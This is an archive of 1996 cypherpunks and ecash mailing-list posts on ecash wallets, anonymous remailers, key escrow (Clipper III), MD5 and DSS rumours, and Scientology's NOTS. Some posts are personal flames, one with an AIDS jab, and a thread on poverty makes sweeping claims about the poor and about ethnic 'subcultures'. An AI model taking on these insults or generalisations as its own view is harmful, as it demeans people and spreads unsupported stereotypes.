From: Matthew Carpenter <mcarpent@mailhost.tcs.tulane.edu>
Date: Sun, 19 May 1996 19:46:07 +0800
To: ecash@digicash.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <199605182017.WAA07561@digicash.com>
Message-ID: <199605190626.BAA62897@rs5.tcs.tulane.edu>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com writes:
> 
> You know, even though current ecash uses on-line clearing, it is
> only necessary for the _payee_ to be on-line at that time.  Thus
> it is entirely possible with current ecash for a payer to load 
> his portable computer up at home with e-coins and then make a 
> purchase a convenience store on the way to work _without_ having
> a networkable computer.  Well-- I mean the computer needs to 
> communicate with the convenience store, but it doesn't need 
> full-scale Internet access.
> 
> 
> Does anyone on cpunks or ecash have an Apple Newton?  I know
> that they come with infrared-- what are the specs on that
> communications device?  And about the Newton itself:  can it
> compile ANSI C code?  How much RAM?  Permanent storage?  Speed
> of crypto operations?

Don't know about the Newton, but one of the first things I thought of
when I picked up a Pilot a week ago was that it would make an excellent
ecash "wallet".

(For those who don't know, the Pilot is the pocket sized PDA from
Palm/USRobotics: 11.9 x 8.1 x 1.8 cm (4.7 x 3.2 x.7 inches), 165 g (5.7
ounces) with batteries.  See http://www.usr.com/palm or
http://www.webcom.com/cyniche/ppage1.htm for more info).

The Pilot isn't as powerful as the Newton, but it is designed to allow
for painless synchronization/communication with the user's desktop
computer, and it is a lot more convenient to pack around than the Newton
and most other small computing devices.  Below I've outlined a procedure
which seems like it would work very well for the Pilot or other PDA's,
palmtops, etc.

Before I head out to go shopping I stop by the ATM to get some money.
But in this case the 'ATM' is just an application on my home computer
which asks me how much money I want to transfer to my PDA.  The program
generates appropriate ecash coins, like the penny Bryce posted to
cypherpunks a few days back, and automatically downloads a copy of them
to the PDA.  These probably need to be encrypted, so that if my "wallet"
is stolen my money isn't lost.  This is just like using an ATM, just
"Please insert your PDA, and enter your PIN," but done without having to
find an ATM and wait in line.

So now I head out shopping and find something I absolutely must buy.  My
PDA asks me for the amount of the purchase (or is told by the merchant's
system and then asks for confirmation), and the 'PIN' I used to encrypt
the coins.  It then selects the appropriate coin(s) for payment,
decrypts them, and sends them to the merchant's computer using IR, a
smart card emulater, or whatever (the Pilot doesn't have IR built in,
but it does have a RS-232 port so IR could be added).  My PDA receives
back any coins as change if needed, and logs info about the transaction
for my financial records.

When I get back home I 'deposit' my change using the same ATM interface.
This also removes from my home computer the copies of the coins I spent,
and automatically updates the transaction records on my PC.

So are there any flaws with above procedure?  It seems to place minimal
strain on the PDA.  All you need on the PDA is some straight forward
encryption and communications routines, along with a fairly simple user
interface.  Of course, since the SDK for the Pilot isn't out yet, it is
hard to tell how well this would work in reality; and I may be
misunderstanding the ecash protocols.  But I would really, really love
to see something like this available.

> 
> 
> Thanks,
> 
> Bryce
> 
> #include <stddisclaimer.h> /* I don't speak for anyone but myself. */
> - -----BEGIN GOODTIMES VIRUS INNOCULATION-----
> Copy me into your .sig for added protection!
> - ----- END  GOODTIMES VIRUS INNOCULATION-----


--Matt

--
mcarpent@mailhost.tcs.tulane.edu    PGP mail preferred, finger for public key.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Sun, 19 May 1996 06:41:28 +0800
To: cypherpunks@toad.com
Subject: NOTS posted to alt.religion.scientology
Message-ID: <199605181653.CAA08185@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain



  Maybe this is about something else (the NOTS materials), or
>maybe the threat of legal action was enough to do Hacktic in, despite what
>would seem to be a favorable precedent.

It wasn't the Fishman Affidavit that was posted - it was the NOTS materials.
The Affidavit material has been in a public court record for some years now,
and was an important factor in the favourable Dutch ruling. The NOTS have
never been subject to public scrutiny. In fact, the Church claims them as
trade secrets as well as copyrighted materials. That may or may not have
changed now that the NOTS have been viewed by who knows how many people.

>It's not clear to me that Scientology is only concerned about copyrighted
>material.  That's what they claim, but then Hubbard said, "The purpose of
>the suit is to harass..."  Copyrights became the issue, IMHO, because they
>have some legal ground to stand on there.

Damn right!
>
>I think their goal is to make all their Net critics come out into the
>open, and they're willing to use the legal system as a pawn towards that
>goal.  You can't threaten or intimidate anon posters as easily.  You can't
>send your private investigators to harass them and their families.

The Church dislikes anonymous remailers intensely, despite exploiting their
advantages themselves. The few comments that their PR reps have made
indicate that the Church wants some way of stripping someone's anonymity
away if they "abuse" this anonymity. I dislike that idea intensely. Everyone
remember anon.penet.fi?

>I appreciate the incredibly difficult position that all of this puts
>remailer operators in, but I don't think CoS will be statisfied with just
>stopping anon Usenet posts.  IMHO, they more likely want the remailers gone,
>altogether.  Don't believe that this is about copyrights, just because
>they say it is.

Like it or not, posting the NOTS _is_ a violation of copyright. While many
people think the Church of $cientology is abusing Intellectual Property laws
in order to keep their secret materials secret, the remailers have the
ability to violate _anyone's_ copyrights. I can imagine a scenario in which
the NSA starts spamming wholesale copyrighted works anonymously in order to
give the Government a compelling reason to legislate against anonymous
remailers.

>Rich
  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 19 May 1996 18:40:50 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Confusing MD5 and DSS? (was Rumor: DSS Broken?)
Message-ID: <199605190720.DAA02505@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 May 96 at 19:30, Robert Hettinga wrote:
[..]
> I was talking to someone who was talking to someone (have I said this is a
> rumor yet?) who was solicited for comment by a Very Famous Reporter about
> the fact that  DSS, the Digital Signature Standard, promulgated by NIST, I
> believe, had been broken.

Hm. Isn't there supposed to be a "TM" after "Very Famous Reporter"?

There was a recent "So..." thread on coderpunks about some collisions 
found for MD5... as reporters are wont to, perhaps MD5 got confused 
with SHS which got further confused with DSS?

Just speculation upon speculation.



Rob.



---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 May 1996 23:01:31 +0800
To: cypherpunks@toad.com
Subject: RE: The Crisis with Remailers
In-Reply-To: <01BB451A.0F4D21C0@blancw.accessone.com>
Message-ID: <Dsa7ND33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


blanc <blancw@accessone.com> writes:
> Bruce:   Vulis is not the twit who wrote that paragraph.  Vulis is not Vlad.
>
> Vulis:   "Vlad" is not Vlad.

Blanc: Bruce is a twit.
(The AIDS virus has eaten to much of his brain that he can't remember
who's who. Very funny. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 20 May 1996 01:48:50 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960519053907.006ceda4@mail.aracnet.com>
Message-ID: <V1D7ND37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh <bruce@aracnet.com> writes:
> While I hate to lend support to anyone as much a twit as Vulis is, he's got

Please refrain from posting your shit to the cypherpunks mailing list.

> Take news.groups, a fairly important group I happen to read regularly. With

You misspelled "impotent".  Now go away.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 19 May 1996 23:49:27 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
In-Reply-To: <199605190149.VAA18805@maildeliver3.tiac.net>
Message-ID: <v03006604adc4c3f96477@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:41 PM  -0400 5/18/96, Bill Stewart wrote:
> MD5 is at least weakened, maybe broken; there's an abstract by Hans Dobbertin
> that says something about generating collisions, and gives an example
> (though the abstract doesn't say how general the method is.)

That's what I get for not reading the DSS stuff when it came out. I'd heard
lots about the MD5 stuff, but I didn't put the two together.

It also looks like I'm behind in my reading.  Time to buy another edition
of Applied Cryptography...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 19 May 1996 23:38:55 +0800
To: cypherpunks@toad.com
Subject: DataHaven Backup and Offshore Email
Message-ID: <Pine.LNX.3.91.960519083708.8133A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




Offshore Information Services announces accounts for datahaven backup
purposes.  For $168/year you can have 10 MB of disk in a datahaven country to
use for backup of important information. 

Also, we have POP email accounts for $168/year.


For full details of our services check out:

  http://online.offshore.com.ai/services.html

  -- Vince







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 20 May 1996 02:09:19 +0800
To: sameer <sameer@c2.org>
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <199605181841.LAA17739@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960519095447.285A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, sameer wrote:

> > 
> > (On the other hand, I have had a longstanding faith that the system can be
> > made to be both payer- and payee-anonymous. Moneychangers, for example.)

I don't know if Ian ever posted his scheme on cypherpunks? There are some 
obvious approaches that were discussed here about six months ago; they 
 involve collaboration between payer and payee (the payee has to 
supply the payee with the blinded serial numbers, which can then be 
reblinded by the payer for transmission). 

This scheme can't be used with the ecash API, and I believe is not looked 
on kindly when applying for ecash licences. It makes you a lot more 
vulnerable to  traffic analysis

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 20 May 1996 03:56:39 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <Pine.BSF.3.91.960518183037.484A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.LNX.3.93.960519100718.1166B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Steve Reid wrote:

> I wonder, would the average spammer be less likely to spam if he had to
> PGP-encrypt messages to the remailer? I know we want to make remailers

	Some of the technically less sophisticated would. But these people
hardly ever use remailers anyway. 

> Also, if a remailer could be set up to _only_ remail to other remailers,
> that would greatly reduce liability. Obviously we'd still need _some_
> remailers that can deliver to the intended destination... I think a lot 
> of people would be more willing to run remailers if it didn't mean that 
> mailing list/usenet spam would have their name attached. 

	The way I am thinking of setting one up would work as the front
end would accept the mail, and the back end, a seperate account would
send it. By using multiple back ends, traffic analysis would be made
marginally less easy, and there would be less complaints about the front
end. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 20 May 1996 03:51:29 +0800
To: cypherpunks@toad.com
Subject: Re: Instant Remailers
In-Reply-To: <adc410f709021004e950@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960519102650.119A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 19 May 1996, Timothy C. May wrote:

> I'm always surprised that this hasn't been happening; maybe it will when
> the new clients become available.
> 
> (Doesn't Sameer's system offer such accounts? Couldn't there be dozens of
> remailers based at c2.org? Of the 16 Type-1 remailers listed in one of
> Raph's recent reports, only 2 were at c2.org.)

I would be a little worried about many remailers being run at one site.  If
the ISP is ever shut down, then a lot of remailers will go down.  This would
be an ideal "choke point" for the feds.

> [...]
> 
> Ideally, such remailers should require no involvement at all by the account
> holder. Just a "start" command, by the account holder. (Not the site
> administrator, as this could be construed as involvement by him.)
> 
> But an "instant remailer" (just add water) is needed. Recent questions here
> on the list about what it takes to run a remailer may mean some advice is
> needed.
> 
> Running a remailer function should never be thought of as being the same as
> running a site. Most of the existing remailers are certainly not being run
> on machines _owned_ by those running the remailers.

Such a program would certainly be feasible.  I might try writing something
like it.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMZ8x+rZc+sv5siulAQFNvwP/U6XRcE+/ad3CC3YSCigvwDIYlLjPyNsC
e9TnKrc56Z1KidIyGmHFS4siyZIjdritA+sEqPOID1OT6b9sQx1YPmOeMeCaWAHE
5AtMrZ+zzpY8bdQh8Vwk8j2T5vKsza+tkuEP3AxnJzCrIPfIQjWRp/f5oz6WE0tj
tXu2QPFEliE=
=W2kT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 20 May 1996 06:40:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605191754.KAA10185@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks is not a political newsgroup.

From: camcc@abraxis.com
X-Sender: camcc@smtp1.abraxis.com
Date: Sun, 19 May 1996 11:40:11 -0400
To: cypherpunks@toad.com
Subject: News from Burma
Sender: owner-cypherpunks@toad.com

-----BEGIN PGP SIGNED MESSAGE-----

ASIA
'Excommunication'

An anglo-Burmese businessman friendly with pro-democracy leader Aung San Suu
Kyi has been sentenced to thre years in jail for owning unauthorized
telephones and fax machines. James Leander Nichols, also known as Leo
Nicholas, was punished for having two fax machines and a telephone
switchboard with nine lines in his home, a spokesman for Suu Kyi's political
party said. In an effort to discourage contact between Burmese citizens and
the outside world, Burma's military government requires people to get
permission to own a fax machine, satellite dish, or sophisticated phone system.

News Services
The Atlanta Constitution/The Atlanta Journal

Alec








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 20 May 1996 06:06:20 +0800
To: cypherpunks@toad.com
Subject: Re: Why the Poor are Mostly Deserving of their Fate
Message-ID: <adc4abd70b0210044c37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 5/18/96, Sean Gabb wrote:
>On Sat, 18 May 1996, Duncan Frissell wrote:
>
>> It was understandable to be poor when all the world was poor.  It is
>> understandable to be poor in those nations today that make the
>> accumulation of wealth a crime for most people.  It is not understandable
>> to be poor (for long) in the US where one can reliably get out of poverty
>> simply by doing three simple things:
>>
>> 1) get a high school diploma
>> 2) get married
>> 3) get any job
>>
>> Only about 2 tenths of 1% of those who satisfy those three requirements
>> incomes below the official poverty line.

>I've done all these things - and rather more in the way of education.  But
>while I don't fall on or near the poverty line, I'm still poor as a church
>mouse.  What am I doing wrong?


* Point Number One: Sean Gabb <cea01sig@gold.ac.uk>
                                                ^^
* Point Number Two:"...not understandable to be poor (for long) in the US"
                                                                       ^^
Q.E.D.


Actually, I think Duncan's "high school + marriage + any job" point is a
bit simplistic, and I'm surprised about the ".02%" estimate. As someone
else noted, there are a lot of folks in the rural South, Appalachia, and
other places, who graduated from high school, are still married, and have
some sort of job, and yet who make $6-8 an hour or less.

I think more is needed. I would have added "savings/investment" and "hard work."

Those who can force themselves to set money aside for investment get the
compounded returns later on. And of course hard work--including taking a
second job, having the extended family work, etc.--is also key.

(Many immigrant Asians arrive penniless in the U.S., then get help from
immigrant Asian who arrived earlier, live in crowded houses and apartments,
have 4-6 wage-earners in a household, save as much as they can, and then
open a small business. Success is almost inevitable. Hence the cycle
continues. This tradition of the various Asian subcultures is almost
completely lacking in certain other subcultures in America. More's the
pity.)


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Mon, 20 May 1996 03:36:38 +0800
To: cypherpunks@toad.com
Subject: Re: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <v01510100adc4b5d657d1@[38.12.5.55]>
MIME-Version: 1.0
Content-Type: text/plain



On 5/18, Tim May wrote:

>A question for Will Rodger: Is this "White Paper" ("The newest proposal is
>contained in a 24-page White Paper, a draft of which hit Capitol Hill
>earlier this week") related in any way to the one being prepared by Herb
>Lin and a bunch of other folks? It was due out about this time, and the
>topic seems similar.  A bunch of us gave input to Herb and his panel at the
>CFP in '95...if this is the same White Paper, looks like we might just as
>well have saved our breath.

Don't know. This did have full input from security agencies, however.

>I read the stuff at the URL, and at first blush it looks to say nothing
>about _domestic_ (within the U.S. and Canada) encryption. I'll be anxious
>to see what the White Paper says about domestic encryption.
>

No restrictions domestically nor in Canada. Even so, these CAs and the
policy body above it clearly give the govt. more of a role in controlling
crypto.


>However, as with other proposed crypto laws and "trial balloons," there are
>several questions which arise:
>
>1. Will there be pressures put on the browser companies (Netscape,
>Microsoft, etc.) and the e-mail companies (Qualcomm, Microsoft, Claris,
>Lotus, etc.) to produce a "world version" that meets export standards with
>a single shrink-wrapped package?
>
>(Recall that last fall some of the various companies stated as their goal
>having a single package that could be shipped worldwide. Some of them
>claimed having two versions, a domestic U.S. version and an international
>version, was too onerous. I am skeptical of this, given that they have
>multiple platforms to support, multiple operating systems, etc. But they
>claim it is.)


>
>2. Interoperability. How will U.S. users exchange messages with
>international users? Will a U.S. user have to register with the Authorities
>to get the proper credentials, protocols, etc.?

No indications they would. Idea is each authority could talk to the other
and request escrowed keys or info. a la interpol. Of course, as today,
there's no guarantee that agreements will always be in place, nor honored.

>
>3. With products like PGP, there are already international users (lots of
>them). Thus, no "export laws" are involved. So, will I be able to
>communicate with them using my existing PGP methods?

Under the White Paper, yes.

>
>And if U.S. users can continue to interoperate with international users as
>they are now doing, this puts the lie to claims about how key escrow will
>be useful for law enforcement.

Which makes it look a lot like the old proposal.

>
>4. And of course there is always the issue of _superencryption_. How a
>GAKked program can detect that superencryption is being used has never been
>adequately explained (to my satisfaction at least). Entropy measures won't
>do it, and forbidding any encryption of messages already containing "BEGIN
>PGP" will clearly just be a klugey bandaid.
>
>5. What about U.S.-based corporations with offshore offices? Is a company
>supposed to replace its entire intranet corporate network with a GAKked
>system if even a single user is outside the U.S.-Canada?

If it's legal now, the paper suggests it should be legal in the future.


>
>6. What about U.S. persons travelling abroad?
>
>7. What about packets zinging around the world? Lots of complications if
>GAK is insisted upon. And lots of new avenues for "packet laundering."
>
>8. The issue of why other countries would insist that their citizens GAK
>their keys when U.S. citizens don't have to!!

>("Yes, Herr Glomlutz, we are insisting that all Germans using Netscape 4.0
>must deposit their keys mit der Key Authority. No, we are not requiring our
>own citizens to do this." I don't think this will fly too well.)
>
>I can't see how other countries will go along with this.

The Paper is quite unclear on this, as well. Presumabyt other countries
will have equally spiffy stuff they will require be escrowed for export
under COCOM. ALl of this, of course, assumes cooperation from OECD, et al.

>
>And what about the usual problem of "rogue nations" like Iraq, Iran, North
>Korea, Israel, and Liberia?

Same as before.

>
>9. Many other issues. (They never answered the similar questions raised the
>last time, so I doubt they will this time.)
>
>
>Clipper III, if it turns out to be another worthless proposal which is
>laughed out of Washington, will be no real threat. If Clipper III actually
>outlaws or places limits on domestic use of crypto (as I think it must,
>else it can be too easily circumvented completely), then it will be a
>rallying cry which will likely see our membership increase still further,
>the anti-Washington rhetoric escalate, and likely some new developments in
>the war.

Stay tuned....

Will Rodger
Washington Bureau Chief
Interactive Week.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Mon, 20 May 1996 03:27:58 +0800
To: cypherpunks@toad.com
Subject: News from Burma
Message-ID: <2.2.32.19960519154011.006bbe78@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ASIA
'Excommunication'

An anglo-Burmese businessman friendly with pro-democracy leader Aung San Suu
Kyi has been sentenced to thre years in jail for owning unauthorized
telephones and fax machines. James Leander Nichols, also known as Leo
Nicholas, was punished for having two fax machines and a telephone
switchboard with nine lines in his home, a spokesman for Suu Kyi's political
party said. In an effort to discourage contact between Burmese citizens and
the outside world, Burma's military government requires people to get
permission to own a fax machine, satellite dish, or sophisticated phone system.

News Services
The Atlanta Constitution/The Atlanta Journal

Alec



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ9ArCKJGkNBIH7lAQFrrAQAw7g/OeEU0IbK+4haxL4r7CWez9R1MqH6
W0Zq1l59XlRDkCCPj34HqrXGchg1Wnnw6LMK7B41JMRl68jvkVLmLnZ9FHwehZ9V
R2WzRM+VzHwcpxQ4Fha1pwdq4Lm5naeS+3FiTQDcbTATT7hpBSiLOXhMNSlxFcBP
G2KtNA2iZAM=
=g8jc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Mon, 20 May 1996 04:58:52 +0800
To: cypherpunks@toad.com
Subject: Re: Sendmail Question (was: SMTP Server for sending to anonymous remailers?)
Message-ID: <2.2.32.19960519164228.006c2528@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:09 AM 5/19/96 -0700, you wrote:

>If you use popmail (like Eudora), then just tell it the server to use in
>"SMTP Host".
>
>        -Lance
>
I have been following this with no little interest. Using Eudora Pro when I
attempt to replace host: smtp1.abraxis.com with *SMTP Host*, I receive the
message *Attempting to resolve host: SMTP Host*, and dat's all until I stop
the send command.

Thanks

Alec
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ9PJyKJGkNBIH7lAQGamwP/e1L3bWlOxCLfcEcSCUK7L2NPyDn3lNoe
n4omNWrcUUOzBpQXg2fxPgmfsBDvao84neqbnkLv4HlPdFqDT/WgbNKzaJILYazS
2W2XsuDY5fxDNizKPmv+BSiPCYCMqCdD96g+Pl52Im1F6D9oEYkbe1Kvpb+iZTOj
UyQUePJKtbk=
=70bm
-----END PGP SIGNATURE-----

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: middle-man-admin@alpha.c2.org
Date: Mon, 20 May 1996 08:50:03 +0800
To: cypherpunks@toad.com
Subject: Re: Instant Remailers
Message-ID: <199605191942.MAA28284@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 May 1996, Timothy C. May wrote:

> >It is possible for someone to operate an anonymous remailer anonymously.
> >Just get a UNIX shell account under a fake name, pay with cash, and set up
> >the remailing software.  The identity of the operator of such a remailer
> >would be difficult, if not impossible, to discover.
> 
> I'm always surprised that this hasn't been happening; maybe it will when
> the new clients become available.

	I'm currently working on a version of Mixmaster that allows an
individual to run a remailer anonymously. The idea is to set up the
primary address of the remailer as a nym. That was easy. I've almost
finished the modifications to Mixmaster to allow it to call Raph Levien's
premail package. I've set it up to cause all outgoing mail to chain
through 2 more random remailers before the message is delivered to the
destination. This effectively allows me to operate as a "hidden
remailer-in-the-middle". I'll provide more details when I finish the code
and it's been thoroughly tested.

middle-man-admin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Mon, 20 May 1996 08:41:34 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers vs Nyms - conflicting assumptions?
Message-ID: <2.2.32.19960519194934.006a9ff0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 PM 5/18/96 -0700, Raph Levien wrote:

>The fact that you can refresh nyms makes the problem you bring up much
>less severe.

Certainly refreshing it every few weeks/months is a good idea anyway. It's
just that I (at least) seem to have this remarkable knack for having
important mail try to get me immediately after a nym server goes down and
before I get the news. That's happened to me three times in the last year.

Refreshing deals with the long-term problem, but not with the short-term
one. Maybe I need to settle for a higher level of mail loss than I'm
comfortable with, but precisely because I'm not comfortable with it, I do
remain interested in alternatives.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 20 May 1996 12:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: Why the Poor are Mostly Deserving of their Fate
In-Reply-To: <adc4abd70b0210044c37@[205.199.118.202]>
Message-ID: <199605191958.MAA18081@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Duncan Frissell wrote:

> It was understandable to be poor when all the world was poor.  It is
> understandable to be poor in those nations today that make the
> accumulation of wealth a crime for most people.  It is not understandable
> to be poor (for long) in the US where one can reliably get out of poverty
> simply by doing three simple things:

> 1) get a high school diploma

While "basic skills" come in useful, is the much touted high
school diploma really a competent measure of these?

The diplomas are handed out to pretty much anyone who sits
through 13 years of public schooling without complaining too
loudly, shooting a teacher, or blowing up the school.  Reading
and the ability to do simple math are not much of a requirement
anymore.

The NEA would love to have a system where ones public school
experience follows one everywhere like an unofficial government
dossier, and employers are free to examine grades and the
opinions of teachers on ones good citizen-unit-ness, denying
employment to everyone who doesn't toe the line.

I think the privacy implications of a vicious education-based
class system, rather than a web of providers of educational
services, held accountable by demanding clients, are fairly
apparent to everyone.

> 2) get married

Well, of course one gets a certain amount of economic power by
breeding and then sending the wife and the kiddies out to work in
the mines.  Not my cup of tea, however.

> 3) get any job

Oh come now.  There are plenty of toothless rural people who can
read and write, and even have families and jobs.  They don't have
much of anything else.

You have heard of the "working poor", haven't you?

Permit me to make a giant leap here and suggest that whether one
is poor pretty much depends upon the market which competes for
ones services.

The major problem (or feature, if you are an employer) of the
jobs market is that one is essentially competing with a large
number of other people to see who will take the least amount of
money to work themselves into an early grave.  No matter what the
value added by ones work to the product being produced, such a
market is essentially a bottomless pit, especially if others
doing the competing are hungry and desperate.

It's kind of like Harlan Ellison's description of the ultimate
television game show.  You bring out a small boy and a dog, and
the contestants vie amongst each other to see who will take the
least amount of money to shoot the dog in front of the boy.

The key to escaping poverty would therefore seem to be to compete
in a market based on the value of what one produces (i.e.
entrepreneurship, small business, consulting), or to compete in
a market where the others competing with one are all fat, happy,
and fairly affluent (i.e. very specialized technical skills).

The success of the Asian community in stressing small business
and higher education would seem to be an excellent example of
this model in action.

I'm not convinced one can escape poverty by simply being a high
school educated hard-working person who is eager to please.

Perhaps this was once the case, but I think the economy is a bit
too tightly stretched these days for such truisms to have any
validity.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 20 May 1996 09:11:59 +0800
To: cypherpunks@toad.com
Subject: Cathy - Sunday, May 19
Message-ID: <199605192012.NAA26058@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Cathy" cartoon today has a bit of positive(?) well, at least it's not
negative, PR about anonymity.
Funny








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 20 May 1996 11:16:45 +0800
To: Steve Reid <root@edmweb.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <Pine.BSF.3.91.960518183037.484A-100000@bitbucket.edmweb.com>
Message-ID: <199605192015.NAA15002@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[remailer incentives]
>As you said, ecash postage could turn that around. The negative publicity
>part is probably the result of the general public's negative perceptions
>about anonymity. 

not!!! I should have made this clear, but imho no matter how favorably
the public sees anonymity, I still believe there will be little
incentive to run remailers until there is some kind of ecash
scheme. you are going to have "bad" uses of anonymity going on as
long as you provide the capability. ask the remailer operators to
estimate how much of their mail is simply taunts between college
students or sexual harassment. I doubt you will ever be able to
evade this.

what cpunks might investigate is an idea of having a pseudonym
server that somehow automatically registers complaints and stamps
messages with known reputation levels.

>People seem to forget that anyone can drop a letter into the mailbox with
>no return address. Did the Unabomber bring negative publicity to the 
>postal service, causing people to demand that return addresses become a 
>requirement? :-/

agreed, but the subject at hand was not whether anonymity is good or bad, 
but whether there is some incentive to run remailers.

>Liability depends on the jurisdiction, doesn't it? It would be ideal if
>all remailers were in countries where there are no laws that would affect
>remailers. Reducing liability also has the added benefit of protecting
>anonymity, since if the mailer can't be siezed, that does prevent log
>files (if any) from being siezed.

by liability I am also referring to a situation in which the 
internet provider is pressured to quit the service by *anyone* not
necessarily agents of the government. past examples are strong evidence
